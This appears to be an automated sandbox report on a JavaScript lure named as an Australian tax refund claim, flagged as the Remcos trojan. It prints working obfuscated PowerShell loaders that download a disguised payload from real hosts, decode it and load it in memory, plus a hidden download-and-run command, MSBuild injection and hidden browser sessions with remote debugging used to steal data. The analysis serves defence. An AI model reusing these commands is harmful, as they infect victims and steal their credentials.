Source: Process Memory Space: MSBuild.exe PID: 8804, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.rans.phis.troj.spyw.expl.evad.winJS@57/222@17/9

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 12_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,

12_2_004182CE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,		15_2_00410DE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,		27_2_00416AB7

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 12_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,

12_2_00418758

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 12_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,

12_2_00413D4C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 12_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,

12_2_0040B58D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 27_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

27_2_00419BD4

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\snSm4[1].txt

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: \Sessions\1\BaseNamedObjects\fyhstga-ONSWMZ
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7364:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4324:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rhoj045m.m5v.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "hpiCiWTCNopizuWaGzCt\hpiCiWTCNopizuWaGzCt.vbs"

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: MSBuild.exe	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: MSBuild.exe	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: MSBuild.exe	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: MSBuild.exe	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: MSBuild.exe	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: MSBuild.exe	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Evasive API call chain: __getmainargs,DecisionNodes,exit

graph_13-32934

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Tax_Refund_Claim_2024_Australian_Taxation_Office.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '0/LucV5/d/ee.e#sap//:sp##h';$restoredText = $originalText -replace '#', 't';$iLnBGeoOpffqoUAKmlhR = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$WhccGUizbJWaNhoCLZCL = New-Object System.Net.WebClient;$NGKHbmbLgczBefhfOAGi = $WhccGUizbJWaNhoCLZCL.DownloadData($iLnBGeoOpffqoUAKmlhR);$KodpfKtodcZPWkkULGWU = [System.Text.Encoding]::UTF8.GetString($NGKHbmbLgczBefhfOAGi);$kQbJzINbGPimbikLeLWW = '<<BASE64_START>>';$KNIAGgPKpufLIacbNxjH = '<<BASE64_END>>';$txWWUeAUmepGGoaWUeCB = $KodpfKtodcZPWkkULGWU.IndexOf($kQbJzINbGPimbikLeLWW);$TPWfGTAfLfnGqWLfpiIW = $KodpfKtodcZPWkkULGWU.IndexOf($KNIAGgPKpufLIacbNxjH);$txWWUeAUmepGGoaWUeCB -ge 0 -and $TPWfGTAfLfnGqWLfpiIW -gt $txWWUeAUmepGGoaWUeCB;$txWWUeAUmepGGoaWUeCB += $kQbJzINbGPimbikLeLWW.Length;$UoiilKJdRANLoPpnucKc = $TPWfGTAfLfnGqWLfpiIW - $txWWUeAUmepGGoaWUeCB;$HhBCjWCWcOAOGasdihln = $KodpfKtodcZPWkkULGWU.Substring($txWWUeAUmepGGoaWUeCB, $UoiilKJdRANLoPpnucKc);$OOiPlmOGWcLpOBNCiWdR = -join ($HhBCjWCWcOAOGasdihln.ToCharArray() \| ForEach-Object { $_ })[-1..-($HhBCjWCWcOAOGasdihln.Length)];$NmLoUkntiBnWiQrtLteW = [System.Convert]::FromBase64String($OOiPlmOGWcLpOBNCiWdR);$QpquWoUGdWWllhPbBgox = [System.Reflection.Assembly]::Load($NmLoUkntiBnWiQrtLteW);$qUzNNPuWfsNLioKiONSx = [dnlib.IO.Home].GetMethod('VAI');$qUzNNPuWfsNLioKiONSx.Invoke($null, @($restoredText, '1', 'hpiCiWTCNopizuWaGzCt', 'hpiCiWTCNopizuWaGzCt', 'MSBuild', 'hpiCiWTCNopizuWaGzCt','hpiCiWTCNopizuWaGzCt','1','https://102.175.153.160.host.secureserver.net/file.js', 'C:\\ProgramData','smudgy','js','5','hpiCiWTCNopizuWaGzCt','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "hpiCiWTCNopizuWaGzCt\hpiCiWTCNopizuWaGzCt.vbs"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://102.175.153.160.host.secureserver.net/file.js' -OutFile 'C:\\ProgramData\smudgy.js'; Start-Process 'C:\\ProgramData\smudgy.js'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\yqrnzxuewrllgkpigkbsooiasehxvvunub"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\akwgap"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\lmkqsiyzy"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\lmkqsiyzy"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\smudgy.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '0/LucV5/d/ee.e#sap//:sp##h';$restoredText = $originalText -replace '#', 't';$iLbCTNCSacaUBlznKdLL = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$BAKhKaLKKhUzWAiLoPeT = New-Object System.Net.WebClient;$CUcWoiOZbZlLkKfkLNKn = $BAKhKaLKKhUzWAiLoPeT.DownloadData($iLbCTNCSacaUBlznKdLL);$hnbcLZWZIRphWirWbKoP = [System.Text.Encoding]::UTF8.GetString($CUcWoiOZbZlLkKfkLNKn);$WdhGWGnCuzIoSWNGzakW = '<<BASE64_START>>';$IiaPzGlWLWAWULkdGasx = '<<BASE64_END>>';$oiGGvTReStQZLhKLLBWJ = $hnbcLZWZIRphWirWbKoP.IndexOf($WdhGWGnCuzIoSWNGzakW);$LcWLWIWLKiPfApOLgbhR = $hnbcLZWZIRphWirWbKoP.IndexOf($IiaPzGlWLWAWULkdGasx);$oiGGvTReStQZLhKLLBWJ -ge 0 -and $LcWLWIWLKiPfApOLgbhR -gt $oiGGvTReStQZLhKLLBWJ;$oiGGvTReStQZLhKLLBWJ += $WdhGWGnCuzIoSWNGzakW.Length;$khUWOGOLPuNkKWuNlJGL = $LcWLWIWLKiPfApOLgbhR - $oiGGvTReStQZLhKLLBWJ;$vZCZRhsdWpmjLCUemdQR = $hnbcLZWZIRphWirWbKoP.Substring($oiGGvTReStQZLhKLLBWJ, $khUWOGOLPuNkKWuNlJGL);$sHPbLeLWLSAKZkdaLmxt = -join ($vZCZRhsdWpmjLCUemdQR.ToCharArray() \| ForEach-Object { $_ })[-1..-($vZCZRhsdWpmjLCUemdQR.Length)];$AlkLoWLeqkLxkmviBqWi = [System.Convert]::FromBase64String($sHPbLeLWLSAKZkdaLmxt);$WxLPHeKiGUInbiBzcbRa = [System.Reflection.Assembly]::Load($AlkLoWLeqkLxkmviBqWi);$OLiclpBLBaWWdiULbLvU = [dnlib.IO.Home].GetMethod('VAI');$OLiclpBLBaWWdiULbLvU.Invoke($null, @($restoredText, 'kSUPzeWAKqsWhWRWCogL', 'kSUPzeWAKqsWhWRWCogL', 'kSUPzeWAKqsWhWRWCogL', 'MSBuild', 'kSUPzeWAKqsWhWRWCogL', 'kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','1','kSUPzeWAKqsWhWRWCogL','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2480 --field-trial-handle=2084,i,136620398097456378,9057800673115670366,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6484 --field-trial-handle=2084,i,136620398097456378,9057800673115670366,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6796 --field-trial-handle=2084,i,136620398097456378,9057800673115670366,262144 /prefetch:8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '0/LucV5/d/ee.e#sap//:sp##h';$restoredText = $originalText -replace '#', 't';$iLnBGeoOpffqoUAKmlhR = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$WhccGUizbJWaNhoCLZCL = New-Object System.Net.WebClient;$NGKHbmbLgczBefhfOAGi = $WhccGUizbJWaNhoCLZCL.DownloadData($iLnBGeoOpffqoUAKmlhR);$KodpfKtodcZPWkkULGWU = [System.Text.Encoding]::UTF8.GetString($NGKHbmbLgczBefhfOAGi);$kQbJzINbGPimbikLeLWW = '<<BASE64_START>>';$KNIAGgPKpufLIacbNxjH = '<<BASE64_END>>';$txWWUeAUmepGGoaWUeCB = $KodpfKtodcZPWkkULGWU.IndexOf($kQbJzINbGPimbikLeLWW);$TPWfGTAfLfnGqWLfpiIW = $KodpfKtodcZPWkkULGWU.IndexOf($KNIAGgPKpufLIacbNxjH);$txWWUeAUmepGGoaWUeCB -ge 0 -and $TPWfGTAfLfnGqWLfpiIW -gt $txWWUeAUmepGGoaWUeCB;$txWWUeAUmepGGoaWUeCB += $kQbJzINbGPimbikLeLWW.Length;$UoiilKJdRANLoPpnucKc = $TPWfGTAfLfnGqWLfpiIW - $txWWUeAUmepGGoaWUeCB;$HhBCjWCWcOAOGasdihln = $KodpfKtodcZPWkkULGWU.Substring($txWWUeAUmepGGoaWUeCB, $UoiilKJdRANLoPpnucKc);$OOiPlmOGWcLpOBNCiWdR = -join ($HhBCjWCWcOAOGasdihln.ToCharArray() \| ForEach-Object { $_ })[-1..-($HhBCjWCWcOAOGasdihln.Length)];$NmLoUkntiBnWiQrtLteW = [System.Convert]::FromBase64String($OOiPlmOGWcLpOBNCiWdR);$QpquWoUGdWWllhPbBgox = [System.Reflection.Assembly]::Load($NmLoUkntiBnWiQrtLteW);$qUzNNPuWfsNLioKiONSx = [dnlib.IO.Home].GetMethod('VAI');$qUzNNPuWfsNLioKiONSx.Invoke($null, @($restoredText, '1', 'hpiCiWTCNopizuWaGzCt', 'hpiCiWTCNopizuWaGzCt', 'MSBuild', 'hpiCiWTCNopizuWaGzCt','hpiCiWTCNopizuWaGzCt','1','https://102.175.153.160.host.secureserver.net/file.js', 'C:\\ProgramData','smudgy','js','5','hpiCiWTCNopizuWaGzCt','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "hpiCiWTCNopizuWaGzCt\hpiCiWTCNopizuWaGzCt.vbs"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\smudgy.js"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\yqrnzxuewrllgkpigkbsooiasehxvvunub"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\akwgap"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\lmkqsiyzy"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\lmkqsiyzy"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '0/LucV5/d/ee.e#sap//:sp##h';$restoredText = $originalText -replace '#', 't';$iLbCTNCSacaUBlznKdLL = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$BAKhKaLKKhUzWAiLoPeT = New-Object System.Net.WebClient;$CUcWoiOZbZlLkKfkLNKn = $BAKhKaLKKhUzWAiLoPeT.DownloadData($iLbCTNCSacaUBlznKdLL);$hnbcLZWZIRphWirWbKoP = [System.Text.Encoding]::UTF8.GetString($CUcWoiOZbZlLkKfkLNKn);$WdhGWGnCuzIoSWNGzakW = '<<BASE64_START>>';$IiaPzGlWLWAWULkdGasx = '<<BASE64_END>>';$oiGGvTReStQZLhKLLBWJ = $hnbcLZWZIRphWirWbKoP.IndexOf($WdhGWGnCuzIoSWNGzakW);$LcWLWIWLKiPfApOLgbhR = $hnbcLZWZIRphWirWbKoP.IndexOf($IiaPzGlWLWAWULkdGasx);$oiGGvTReStQZLhKLLBWJ -ge 0 -and $LcWLWIWLKiPfApOLgbhR -gt $oiGGvTReStQZLhKLLBWJ;$oiGGvTReStQZLhKLLBWJ += $WdhGWGnCuzIoSWNGzakW.Length;$khUWOGOLPuNkKWuNlJGL = $LcWLWIWLKiPfApOLgbhR - $oiGGvTReStQZLhKLLBWJ;$vZCZRhsdWpmjLCUemdQR = $hnbcLZWZIRphWirWbKoP.Substring($oiGGvTReStQZLhKLLBWJ, $khUWOGOLPuNkKWuNlJGL);$sHPbLeLWLSAKZkdaLmxt = -join ($vZCZRhsdWpmjLCUemdQR.ToCharArray() \| ForEach-Object { $_ })[-1..-($vZCZRhsdWpmjLCUemdQR.Length)];$AlkLoWLeqkLxkmviBqWi = [System.Convert]::FromBase64String($sHPbLeLWLSAKZkdaLmxt);$WxLPHeKiGUInbiBzcbRa = [System.Reflection.Assembly]::Load($AlkLoWLeqkLxkmviBqWi);$OLiclpBLBaWWdiULbLvU = [dnlib.IO.Home].GetMethod('VAI');$OLiclpBLBaWWdiULbLvU.Invoke($null, @($restoredText, 'kSUPzeWAKqsWhWRWCogL', 'kSUPzeWAKqsWhWRWCogL', 'kSUPzeWAKqsWhWRWCogL', 'MSBuild', 'kSUPzeWAKqsWhWRWCogL', 'kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','kSUPzeWAKqsWhWRWCogL','1','kSUPzeWAKqsWhWRWCogL','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2480 --field-trial-handle=2084,i,136620398097456378,9057800673115670366,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6484 --field-trial-handle=2084,i,136620398097456378,9057800673115670366,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6796 --field-trial-handle=2084,i,136620398097456378,9057800673115670366,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
